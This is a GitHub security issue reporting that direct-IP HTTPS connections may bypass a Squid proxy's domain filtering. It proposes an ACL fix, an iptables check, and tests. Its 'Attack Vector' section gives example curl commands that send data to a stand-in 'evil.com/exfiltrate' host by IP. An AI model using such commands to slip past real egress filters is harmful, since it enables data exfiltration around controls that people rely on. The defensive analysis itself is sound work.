Skip to content

[Security] Direct IP + TLS connections may bypass domain filtering #137

New issue
New issue
Open
#142
Open
[Security] Direct IP + TLS connections may bypass domain filtering#137
#142
Assignees
Mossakacopilot-swe-agent
Labels
bugSomething isn't working
@Mossaka

Description

@Mossaka
Mossaka
opened on Dec 19, 2025

Priority

P1 - High

Summary

When a client connects directly to an IP address using HTTPS (without a domain name), Squid cannot extract SNI information. This may allow bypassing domain-based filtering.

Current Behavior

Normal HTTPS request:

CONNECT github.com:443 HTTP/1.1
→ Squid extracts "github.com" from CONNECT request
→ Domain ACL check performed

Direct IP HTTPS request:

CONNECT 140.82.114.4:443 HTTP/1.1
→ Squid sees only IP address
→ No domain to match against ACL

Attack Vector

# Attacker knows the IP of evil.com
EVIL_IP=$(dig +short evil.com)

# Direct IP connection - no domain in request
curl --resolve evil.com:443:$EVIL_IP https://evil.com/exfiltrate
# Or even simpler:
curl -k https://$EVIL_IP/exfiltrate

Current Mitigation

Host-level iptables has a default deny rule that should block traffic to unknown IPs:

  • Only traffic to Squid (172.30.0.10) and DNS servers is allowed
  • All other outbound traffic is blocked

Verification Needed

Test whether direct IP connections are blocked:

sudo awf --allow-domains example.com -- /bin/bash -c '
  echo "--- Test 1: Via domain name ---"
  curl -s -o /dev/null -w "%{http_code}\n" https://example.com
  
  echo "--- Test 2: Via direct IP ---"
  curl -s -o /dev/null -w "%{http_code}\n" --max-time 5 https://93.184.216.34 2>&1 || echo "Failed/Blocked"
  
  echo "--- Test 3: Check Squid log ---"
  sleep 2
  cat /tmp/awf-*/squid-logs/access.log | tail -5
'

Expected Behavior

Direct IP connections should be blocked by:

  1. Squid ACL: Explicit deny for non-domain CONNECT requests
  2. Host iptables: Default deny for non-whitelisted destinations

Proposed Fix

Option A: Explicit Squid ACL for IP-based CONNECT

Add to src/squid-config.ts:

# Deny CONNECT to IP addresses (no domain)
acl ip_connect dstdom_regex ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$
http_access deny ip_connect

Option B: Verify host iptables blocks this

Ensure default deny rule catches this case:

# In src/host-iptables.ts
# Verify: -A FW_WRAPPER -j DROP (default deny)

Files to Modify

  • src/squid-config.ts - Add IP CONNECT deny rule
  • src/squid-config.test.ts - Test IP CONNECT is denied
  • Verification script for testing

Testing

  • Direct IP HTTPS is blocked
  • Domain-based HTTPS still works
  • Squid logs show IP CONNECT attempts as denied
  • Host iptables provides backup blocking

Metadata

Metadata

Assignees

Labels

bugSomething isn't working

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions